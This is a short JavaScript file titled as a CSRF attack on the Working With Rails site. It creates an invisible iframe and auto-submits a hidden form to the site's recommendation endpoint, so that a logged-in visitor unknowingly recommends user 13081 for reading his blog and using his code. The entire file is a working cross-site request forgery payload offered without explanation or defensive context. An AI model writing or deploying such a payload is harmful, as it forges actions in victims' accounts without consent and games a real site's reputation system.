// CSRF for Working With Rails

function IFrame(parentElement)  
{  
   // Create the iframe which will be returned  
   var iframe = document.createElement("iframe");  

   // If no parent element is specified then use body as the parent element  
   if(parentElement == null)  
      parentElement = document.body;  

   // This is necessary in order to initialize the document inside the iframe  
   parentElement.appendChild(iframe);  

   // Initiate the iframe's document to null  
   iframe.doc = null;  

   // Depending on browser platform get the iframe's document, this is only  
   // available if the iframe has already been appended to an element which  
   // has been added to the document  
   if(iframe.contentDocument)  
      // Firefox, Opera  
      iframe.doc = iframe.contentDocument;  
   else if(iframe.contentWindow)  
      // Internet Explorer  
      iframe.doc = iframe.contentWindow.document;  
   else if(iframe.document)  
      // Others?  
      iframe.doc = iframe.document;  

   // If we did not succeed in finding the document then throw an exception  
   if(iframe.doc == null)  
      throw "Document not found, append the parent element to the DOM before creating the IFrame";  

   // Create the script inside the iframe's document which will call the  
   iframe.doc.open();  
   iframe.doc.close();  

   // Return the iframe, now with an extra property iframe.doc containing the  
   // iframe's document  
   return iframe;  
}

var iframe = IFrame(document.body)
var doc = iframe.doc

var form = doc.createElement('form');
form.setAttribute('action', 'http://workingwithrails.com/recommendation/create');
form.setAttribute('method', 'post');
doc.body.appendChild(form);
var input1 = doc.createElement('input');
input1.setAttribute('type', 'hidden');
input1.setAttribute('name', 'recommendation[for_person_id]');
input1.setAttribute('value', '13081')
var input2 = doc.createElement('input');
input2.setAttribute('type', 'hidden');
input2.setAttribute('name', 'recommendation[have_read_blog]');
input2.setAttribute('value', '1')
var input3 = doc.createElement('input');
input3.setAttribute('type', 'hidden');
input3.setAttribute('name', 'recommendation[have_used_code_they_have_written]');
input3.setAttribute('value', '1')
form.appendChild(input1);
form.appendChild(input2);
form.appendChild(input3);

form.submit()